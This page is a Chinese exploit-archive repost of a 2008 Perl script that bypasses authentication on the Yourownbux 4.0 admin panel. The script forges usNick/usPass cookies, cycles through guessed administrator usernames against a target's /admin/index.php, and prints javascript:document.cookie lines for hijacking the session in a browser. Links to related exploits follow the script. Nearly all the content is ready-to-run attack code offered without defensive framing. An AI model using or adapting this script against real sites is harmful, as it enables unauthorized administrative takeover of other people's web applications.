手机
当前位置:查字典教程网 >网络安全 >Exploit >Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useHTTP::Request;#-------------------...

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Request;

# ------------------------------------------------------------------------------------------------- -#

# Yourownbux v4.0 ------------------------------------------------------------ --

# Cookie Modification Exploit -----------------------------------------------------------------

# Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------

#

# Dropsec.com

#

# Modify The Line 39, Adding More User's that can be the admin username------------

#

# Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --

# ------------------------------------------------------------- ----------------------------------------#

system("clear");

print "

# Yourownbux v4.0 Cookie Modification Exploitn# Discovered By: Tec-n0xnn# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com

nn";

print "Target [ Example: www.sitedemo.com ] :n> ";

$target = <STDIN>;

chop($target);

if($target =~ m/www.(.*).(.*)/) {

$other = $1;

check1($target);

} else {

print "nInvalid Target.";

exit();

}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");

# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "ntTrying > $usern";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!nnValid Username: $usernnGo to: $checknn And Put this on your browser:";

$vd = "javascript:document.cookie = "usNick=$user; path=/";";

$vda = "javascript:document.cookie = "usPass=Dropsec.com; path=/";";

print "

------------------------------------

$vdn $vda

------------------------------------

";

$yes = 1;

exit();

}

}

}

if($yes != 1) {

print "nnnExploit Failed";

exit();

}

}

sub check1 {

$target = shift;

$check = "http://$target/admin/index.php";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}

【Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit】相关文章:

Joomla Component EZ Store Remote Blind SQL Injection Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

The Personal FTP Server 6.0f RETR Denial of Service Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

精品推荐
分类导航